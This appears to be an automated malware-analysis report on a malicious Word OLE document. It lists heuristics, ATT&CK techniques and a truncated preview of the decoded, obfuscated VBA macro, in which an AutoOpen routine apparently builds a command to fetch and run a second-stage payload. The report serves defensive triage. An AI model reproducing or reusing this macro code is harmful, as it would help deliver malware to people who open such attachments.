MALICIOUS
164
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing a legacy WordBasic AutoOpen macro. This macro triggers obfuscated VBA code that uses `CreateObject` and appears to be designed to download and execute a second-stage payload. The presence of a large slack space anomaly in the OLE structure is also suspicious.
Heuristics 7
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 160,256 bytes but its declared streams total only 48,140 bytes — 112,116 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42235 bytes |
SHA-256: 0340c914f83189f1ee4d04ed4876f37f8710bf96cca00bbbdbcf0d981204bcfd |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wlHvQSsw"
Sub AutoOpen()
On Error Resume Next
Select Case icUwoc
Case 66120
jDXitq = Hex(94927 - CSng(40640) - 43252 + ChrW(BfTfv))
zlcvA = HlikaN
End Select
Application.Run "OWfjdYpPFv", TVNTRQBORNh
Select Case BHwTJ
Case 57666
ccFuKa = Hex(88394 - CSng(27835) - 83779 + ChrW(YwhCz))
zmmCw = vJQjBU
End Select
End Sub
Attribute VB_Name = "zIbSjhAZLBA"
Function cYTZXrs()
On Error Resume Next
Select Case chrrI
Case 75359
SFPKwz = Hex(40200 - CSng(92482) - 42592 + ChrW(jQZiK))
rAYIGf = qMjNGB
End Select
wcYknvdzuV = IwsJzD("Vo,cizzQEAMdiRX", 4, 2)
Select Case szradq
Case 44295
aiYIbq = Hex(66433 - CSng(83157) - 89246 + ChrW(SCzrji))
mcZzNk = uqijY
End Select
Select Case VJXjR
Case 76698
jSbhkH = Hex(94050 - CSng(53232) - 84990 + ChrW(tFDUtO))
LZjTk = dvwsiA
End Select
QdiiN = IwsJzD("W4zuSwZZuMzvUKHW F@PN", 5, 13)
Select Case dnYBqR
Case 85027
VuvNzU = Hex(75365 - CSng(56467) - 33119 + ChrW(buIVsH))
wawmo = SbJGF
End Select
Select Case biuQjm
Case 72054
YINRFQ = Hex(45462 - CSng(64872) - 86120 + ChrW(NwbYNP))
LvAzsw = owWbV
End Select
vBpziU = IwsJzD("VnIizzQEA% /V 2aF", 4, 16)
Select Case FwqZi
Case 83131
CusknX = Hex(79421 - CSng(82500) - 70057 + ChrW(CUiTV))
lnfKCc = uwMmd
End Select
Select Case GHiNjS
Case 68783
sfKBN = Hex(44462 - CSng(97836) - 9625 + ChrW(RUisYJ))
EXkupZ = pwuUh
End Select
kamPwYrXdZs = IwsJzD("c6KoizzQEAmizzQEASizzQEApizzQEAEizzQEAc6u6P", 4, 11)
Select Case nMpQGv
Case 20000
TShcj = Hex(2659 - CSng(60510) - 45996 + ChrW(jhwEIJ))
pUTaUD = CRSwF
End Select
Select Case HwbEaj
Case 64715
QrPdfo = Hex(47174 - CSng(40748) - 88487 + ChrW(BkhBzH))
RcDid = jwtJDv
End Select
vwdkGlaIiG = IwsJzD("6oizzQEAmizzQEASizzQEApizzQEAEizzQEAcizzQEA% fsIWFMwz", 2, 18)
Select Case YVhQFN
Case 15968
OiZDcP = Hex(64057 - CSng(97912) - 14789 + ChrW(wUpJD))
Qmzjil = UZLZjC
End Select
Select Case GoINDL
Case 61595
oTdXqf = Hex(95185 - CSng(62920) - 73163 + ChrW(ZfpuSj))
brCim = DhUsiB
End Select
WDEfsLI = IwsJzD("ws0@lmd khbFTwscKSmK2L,u", 6, 15)
Select Case wFzYm
Case 34316
ciRmHM = Hex(13640 - CSng(42663) - 27497 + ChrW(LVbIb))
dTBsZ = VnSfkA
End Select
Select Case oqHIJ
Case 4132
RHXKVj = Hex(54730 - CSng(39751) - 38072 + ChrW(dudpAz))
CcJNi = bVYiqq
End Select
AThfOwZbGHj = IwsJzD("2zu& %izzQEAcizzQEA7iHdMO", 4, 10)
Select Case CPYjY
Case 48711
mYPlK = Hex(36738 - CSng(99271) - 2043 + ChrW(EXnrrF))
sRiivp = FldOZO
End Select
Select Case pkBVNN
Case 5466
sHjwJ = Hex(30481 - CSng(5208) - 9288 + ChrW(FkhhjO))
YRtsHw = LUAttw
End Select
GuLOzp = IwsJzD("Z,zuVZ @n", 7, 1)
Select Case TbaBn
Case 86406
GtJTGF = Hex(67152 - CSng(34136) - 54346 + ChrW(JVVzv))
KRuaX = IWJGql
End Select
Select Case dAZiUr
Case 78812
uLBYWi = Hex(68270 - CSng(14282) - 56991 + ChrW(Rvdsjm))
OYcsM = RNnDMc
End Select
HCpSQGn = IwsJzD("uiiZ JZpoQGcBzWOBHHP Cvt%mn", 3, 19)
Select Case cHONr
Case 55815
riuQdt = Hex(18924 - CSng(4897) - 54123 + ChrW(kRmJF))
MCikk = ifWfR
End Select
Select Case uXBzCX
Case 87652
pIoDS = Hex(15954 - CSng(27562) - 13032 + ChrW(RqrzN))
haiWZA = hbcswq
End Select
hFribGD = IwsJzD("hiCiVt /c 6W", 7, 14)
Select Case Xbhzps
Case 77156
LzIbMA = Hex(49039 - CSng(79138) - 83495 + ChrW(jpTZUA))
XqbNa = MYRwp
End Select
Select Case nVuIhI
Ca
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.